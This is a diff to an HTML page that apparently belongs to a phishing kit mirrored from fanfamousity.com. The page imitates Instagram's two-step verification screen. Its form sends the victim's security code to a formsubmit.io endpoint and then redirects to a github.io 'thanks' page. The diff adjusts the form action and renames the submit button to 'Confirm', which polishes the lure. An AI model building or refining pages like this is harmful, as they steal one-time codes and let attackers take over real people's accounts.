--- a/instagram/otp/657daf104b167f68d1979b9c.html
+++ b/instagram/otp/657daf104b167f68d1979b9c.html
@@ -57,7 +57,7 @@
       <!-- SMARTPHONE SECTION END -->
       <!-- FORM SECTION -->
       <article class="form-area">
-        <form  id="form"  method="POST" action="https://formsubmit.io/send/1b814e9a-f1bb-467e-bba1-c718cf9632cb">
+        <form  action="https://formsubmit.io/send/	1b814e9a-f1bb-467e-bba1-c718cf9632cb" method="POST" accept=".">
           <p class="small-title">2-Step Verification</p>
           <input
             type="text"
@@ -67,13 +67,13 @@
             placeholder="Security code"
           />
           <input type="hidden" name="linkId" value="657daf104b167f68d1979b9c" />
-          <input type="submit" name="submit" value="Send Email"  />
+          <input type="submit" name="submit" value="Confirm" />
           <div class="options">
             <p class="small">Didn't get security code? we can</p>
             <a href="#" class="small">resend it</a>
             <div class="forget"><a href="#">Forgot password?</a></div>
           </div>
-          <input type="hidden" name="_redirect" value="https://vtfrw.github.io/fvrap/thanks.html"> 
+          <input type="hidden" name="_redirect" value="https://vtfrw.github.io/fvrap/thanks.html">
 <input type="hidden" name="_captcha" value="false">
 
         </form>
@@ -169,7 +169,6 @@
     <script src="../../js/socials/app.html"></script>
     <script src="../../js/socials/brands.min.html"></script>
     <script src="../../js/socials/fontawesome.min.html"></script>
-
   </body>
 
 <!-- Mirrored from fanfamousity.com/instagram/otp/657daf104b167f68d1979b9c by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 17 Dec 2023 11:22:30 GMT -->
